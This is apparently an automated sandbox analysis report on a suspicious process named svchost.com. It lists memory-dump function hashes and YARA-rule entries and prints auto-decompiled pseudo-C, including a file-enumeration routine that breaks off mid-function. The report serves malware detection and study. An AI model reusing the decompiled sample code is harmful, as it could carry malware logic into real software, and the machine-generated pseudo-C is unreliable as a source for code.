                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                          • Instruction ID: e247c90ebae2dad5e92510222d483316103bec3288d1368518a102bb7fa3f05c
                                                                                                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                          • Instruction Fuzzy Hash: DDC08C701899C05AEB2A5788CE21B20F658BB08708F88099CBA01096A2E369EC02C209
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009E7D50, Relevance: .0, Instructions: 7COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                          • Instruction ID: d3d3e37365286a6f3165ec2f5f4aa05cbf89bc5bbba71d535e63d33a270b1b64
                                                                                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                          • Instruction Fuzzy Hash: 60B09234301981CFCE16DF19C480B1573E8BB44B40B8400D0E400CBA20D229EC408900
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009F2ACB, Relevance: .0, Instructions: 5COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                          • Instruction ID: 9f81abd72d1d39278f7e3446ae5917a7aefaefbaa712c5c9b2542fe40585b32b
                                                                                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                          • Instruction Fuzzy Hash: 58B01232C50540CFCF02FF40C610B197331FB40750F058492A0012BA31C22CBC01CB40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A098A0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                                                                          • Instruction ID: a8cf857df87f6bd03865a0eb8afb916004f5972a04dd5b3f14e8d12fa6ce18cf
                                                                                                                          • Opcode Fuzzy Hash: 7f57d8ec620b5477713a7041f4138c1f89f7de3b5949056ddd3d970e0af6c7e0
                                                                                                                          • Instruction Fuzzy Hash: 4F90026130101402D202616944146460409D7D1385F91C422E1414555D86658993F1B2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09820, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                                                                          • Instruction ID: 0b268831c4c1ab52680674bb3939a4bb22d2de30e32814bef46280208555ae7a
                                                                                                                          • Opcode Fuzzy Hash: a95b55083c9078d4c0148a203ff530e1d0fd8da1bf08b7b1e37988ad21b478e8
                                                                                                                          • Instruction Fuzzy Hash: C890027124101402D241716944046460409A7D0381F91C422A0414554E86958A96FAE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0B040, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                                                                          • Instruction ID: acf0d5f479c79240ac9ac3f0f0c07aefe48256605cffbc211af4fdd1922508f2
                                                                                                                          • Opcode Fuzzy Hash: acf0c5ca6763ce112214fdba1750dead8e58c65212ac86bb2dd03a9595d1ad0d
                                                                                                                          • Instruction Fuzzy Hash: 119002A1601150434640B16948044465415A7E1341391C531A0444560C86A88895E2E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A099D0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                                                                          • Instruction ID: a40fc812ad20c0d0bfccf7cd46ae6051b02e7a62ad9cbeb0bb490aa243aa8551
                                                                                                                          • Opcode Fuzzy Hash: 3e3134b4b9b74d5b5f2d45300f61748f4729402a362236be3a1df73dcaafaede
                                                                                                                          • Instruction Fuzzy Hash: 9C9002A121101042D20461694404746044597E1341F51C422A2144554CC5698CA1A1A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09950, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                                                                          • Instruction ID: 9d87ebb25f7e16c674cf0bdcc66ad79c6c983cba86160841acaefd05b65c1d6a
                                                                                                                          • Opcode Fuzzy Hash: 0ec523b322f154841782fe45702d7bb620cdbbf48eac7ed7b0442deeea57f1d9
                                                                                                                          • Instruction Fuzzy Hash: 329002A120141403D24065694804647040597D0342F51C421A2054555E8A698C91B1B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09A80, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                                                                          • Instruction ID: f4c5860114ddf17f9db68ecdf7c04f689360a1830384660e23aad6d85af66e4b
                                                                                                                          • Opcode Fuzzy Hash: 8c1a2e58d0a9ee9d905b37cec31034e9a00ab54e61687ecd0b08b9711e7ad384
                                                                                                                          • Instruction Fuzzy Hash: 1F90026120145442D24062694804B4F450597E1342F91C429A4146554CC9558895A7A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09A10, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                                                                          • Instruction ID: f212c6223a443c7e31d175cbe2b1ac146a28fab09b18ce3e74788c09f461f788
                                                                                                                          • Opcode Fuzzy Hash: 5b50242622c097c1ee3ab1105051543370df660245f824523dd5cfe0eca8c0e2
                                                                                                                          • Instruction Fuzzy Hash: 4590027120141402D20061694808787040597D0342F51C421A5154555E86A5C8D1B5B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0A3B0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                                                                          • Instruction ID: 35a2c4a2356be97c713b9b11c77802ac3579c4f72cf500f85071e0fb5cbe680b
                                                                                                                          • Opcode Fuzzy Hash: 7e7bf762dbf6bb3b163a6c58d365a8d85a166491c1605bf008595114bc300184
                                                                                                                          • Instruction Fuzzy Hash: 1990027120145002D2407169844464B5405A7E0341F51C821E0415554C86558896E2A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09B00, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                                                                          • Instruction ID: d2fedbcecf7a950f5374f74c095b12ae17afb836810d99b7043c15328ee36e23
                                                                                                                          • Opcode Fuzzy Hash: 03e685d4f64a78ebac497f8df8d3f8371ac3c3f2269777c46a2b0d514afb49dd
                                                                                                                          • Instruction Fuzzy Hash: FB90026124101802D240716984147470406D7D0741F51C421A0014554D865689A5B6F1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A095F0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                                                                                                          • Instruction ID: e887574115e6291994776ade48fdfe3a4aa9aeef2f1fd83914d63565fb87ff4c
                                                                                                                          • Opcode Fuzzy Hash: b4956eb517797e7b37e7b1b20ff41f7d8bd09807949bcc0b2932efbd293f6a32
                                                                                                                          • Instruction Fuzzy Hash: 3890027120101802D204616948046C6040597D0341F51C421A6014655E96A588D1B1B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09520, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                                                                                                          • Instruction ID: aa12941b71ce22c5ec157d25e5727ab8101b1e66847fe9b6ce386c495632ef30
                                                                                                                          • Opcode Fuzzy Hash: ea96a56835bab26a5bfc4a94e5156efaaf478f9867840fdc7a2bb988912b01a7
                                                                                                                          • Instruction Fuzzy Hash: 049002E1201150924600A2698404B4A490597E0341B51C426E1044560CC5658891E1B5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0AD30, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                                                                                                          • Instruction ID: dcf145d2a0992ac5f6972e22c51be163b7bb9ad120272f0053a6651c5f78a39a
                                                                                                                          • Opcode Fuzzy Hash: 1a0f46c947ca884abbed91b2648bb9bcaf625a9307eddeb20f9a6d7f82546646
                                                                                                                          • Instruction Fuzzy Hash: 3D900271A05010129240716948146864406A7E0781B55C421A0504554C89948A95A3E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09560, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                                                                                                          • Instruction ID: 65897f1f7df915f69680ae797b9bea826366557d757b4b143bfcaf83edec5a20
                                                                                                                          • Opcode Fuzzy Hash: 84066b475a91b52b7025c75f9435e0c66b426e826bf3938201d65c25b428ee5e
                                                                                                                          • Instruction Fuzzy Hash: C4900265221010020245A569060454B0845A7D6391391C425F1406590CC66188A5A3A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A096D0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                                                                                                          • Instruction ID: a6de25885d4ddb5bc7472cdb7a1e82fd784322be88a4c22f1469f4e8246c785f
                                                                                                                          • Opcode Fuzzy Hash: c3b0371c301dd4de59500bc95b1eceb90fb157d36aca943668aaa6054f124641
                                                                                                                          • Instruction Fuzzy Hash: CB90027120101842D20061694404B86040597E0341F51C426A0114654D8655C891B5A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09610, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                                                                                                          • Instruction ID: 3aae62aa8c56198208e2baf391671b09e3792a5d2cc022712fd769eeda9bed22
                                                                                                                          • Opcode Fuzzy Hash: 3db51edff0a426eb572a72eee843e25e32d9e7047f7ae0e505699f2cde9f589b
                                                                                                                          • Instruction Fuzzy Hash: 4690027160501802D25071694414786040597D0341F51C421A0014654D87958A95B6E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09650, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                                                                                                          • Instruction ID: ac43491b3d4451088206f3c0df52bd3e76dbb0b46fbd301310f6a850597c6de2
                                                                                                                          • Opcode Fuzzy Hash: 61f0576ba1d3d40dd7f958760d47ad23e1dfa15580bc878c2f5c3af72e6e33f5
                                                                                                                          • Instruction Fuzzy Hash: 7490027120505842D24071694404A86041597D0345F51C421A0054694D96658D95F6E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09FE0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                                                                                                          • Instruction ID: 081c01b96c3e170aec37ee04d371d35005f4d4e547f399acb0f3bdc49266b50b
                                                                                                                          • Opcode Fuzzy Hash: 4e8da0864713dd6ef1d00f3d5a4c1816e64c0e73b59c0357034dba740e280a85
                                                                                                                          • Instruction Fuzzy Hash: D890027131115402D21061698404746040597D1341F51C821A0814558D86D588D1B1A2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09730, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                                                                                                          • Instruction ID: 0447279c205caa384f4d89fc08c58219dd3feb71ae969dae4871b449b9b397d0
                                                                                                                          • Opcode Fuzzy Hash: 73b93d0a0b49325c4191dee88f16edc116ab99f492bce43fc799c9e2cb672e1b
                                                                                                                          • Instruction Fuzzy Hash: BA90026160501402D24071695418746041597D0341F51D421A0014554DC6998A95B6E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0A710, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                                                                                                          • Instruction ID: 4f9cfaac5c4b9bc5f350f3032fa2162baaebd8ffb11511f72aef7ae4d89ae8fb
                                                                                                                          • Opcode Fuzzy Hash: e1de816202fdbf0dc5c3b2dcab1d8b6082018183dfbbdb6fb3fc93bffa106b78
                                                                                                                          • Instruction Fuzzy Hash: 05900271301010529600A6A95804A8A450597F0341B51D425A4004554C859488A1A1A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09760, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                                                                                                          • Instruction ID: 6161ed1c96c8455890c1f4271aa2edab8ebf969a51aa5f7db855893b9f930ef0
                                                                                                                          • Opcode Fuzzy Hash: d9fee682c6e38763bde499e50fdd6fd6b4f227e1bf4f15c8c6a50b35e6c97bbf
                                                                                                                          • Instruction Fuzzy Hash: 0190027120101403D20061695508747040597D0341F51D821A0414558DD6968891B1A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09770, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                                                                                                          • Instruction ID: a9771e8ba13c254f64fc4a33f4a49f6398ce908e05151f7d14d6a5d11b408f71
                                                                                                                          • Opcode Fuzzy Hash: 3bab09fccece77ccaca4588e47b29f8956165bc96713490cabb5005bdc622e20
                                                                                                                          • Instruction Fuzzy Hash: EA90026120505442D20065695408A46040597D0345F51D421A1054595DC6758891F1B1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A0A770, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                                                                                                          • Instruction ID: 5847bf32bf62a41ba9cdc3f47874bcb6937f8d28ab153e4a53c387a6bb3fdf9d
                                                                                                                          • Opcode Fuzzy Hash: 78ad3d5117f62963eec4683e698f0c0668aeb52faee5236d7444f1b2692a2421
                                                                                                                          • Instruction Fuzzy Hash: 6790027520505442D60065695804AC7040597D0345F51D821A041459CD869488A1F1A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A09670, Relevance: .0, Instructions: 2COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction ID: e3402ee03f312e289058b1bfefd1d935daa076871646f2a9186fa30f0aef9e36
                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A5FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E00A5FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A0CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A55720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A55720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                          0x00a5fdda
                                                                                                                          0x00a5fde2
                                                                                                                          0x00a5fde5
                                                                                                                          0x00a5fdec
                                                                                                                          0x00a5fdfa
                                                                                                                          0x00a5fdff
                                                                                                                          0x00a5fe0a
                                                                                                                          0x00a5fe0f
                                                                                                                          0x00a5fe17
                                                                                                                          0x00a5fe1e
                                                                                                                          0x00a5fe19
                                                                                                                          0x00a5fe19
                                                                                                                          0x00a5fe19
                                                                                                                          0x00a5fe20
                                                                                                                          0x00a5fe21
                                                                                                                          0x00a5fe22
                                                                                                                          0x00a5fe25
                                                                                                                          0x00a5fe40

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A5FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A5FE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A5FE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                                                                          • Instruction ID: 96e45386d4b3a81d1b37ac4873e997ea375468bc9e47f36266e5cb260fc2406d
                                                                                                                          • Opcode Fuzzy Hash: 05f2b1fcdb6c4e0f3fb10e9f6ecfb3c497451875d7a5507d71965bc8a1d38da1
                                                                                                                          • Instruction Fuzzy Hash: 8DF0F632600601BFDA201B55DD03F63BF6AEB84731F240314FA28565E1DA72F86096F0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: svchost.com PID: 3728 Parent PID: 3440 svchost.comCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 00405634, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 61%
                                                                                                                          			E00405634(void* __eax, intOrPtr __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v292;
				char _v336;
				void* __ebx;
				void* __edi;
				void* __ebp;
				CHAR* _t38;
				void* _t39;
				void* _t44;
				int _t45;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t60;
				void* _t63;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				struct _WIN32_FIND_DATAA* _t87;

				_t85 = __esi;
				_t70 = __edx;
				_t61 = __ecx;
				_t60 = __eax;
				asm("pushad");
				E004052D8(__eax);
				 *((intOrPtr*)(_t60 + 0x18)) = E0040456C();
				asm("popad");
				asm("pushad");
				_t2 = _t60 + 0x1c; // 0x1c
				E004030E8(_t2, _t70);
				asm("popad");
				if( *((intOrPtr*)(_t60 + 0x1c)) != 0) {
					asm("pushad");
					_t4 = _t60 + 0x1c; // 0x1c
					E00404DB8( *_t4, _t4);
					_t32 =  *((intOrPtr*)(_t60 + 0x20));
					if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
						_t56 = E00405C80();
						 *((intOrPtr*)(_t60 + 0x20)) = _t56;
						asm("popad");
						asm("pushad");
						_t57 = _t61;
						_t61 = _t56;
						_t58 = E004048D8(_t57, _t56, 0x40569b);
						_t82 = _t61;
						if(_t58 == 0) {
							_t82 = E004056A7;
						}
						_t32 = E00405CAC( *((intOrPtr*)(_t60 + 0x20)), _t82);
					}
					asm("popad");
					_t87 = _t86 + 0xfffffec0;
					_push(0);
					_push(0);
					E00405300(_t61, _t60, _t32, _t87, _t83, _t85);
					_pop(_t63);
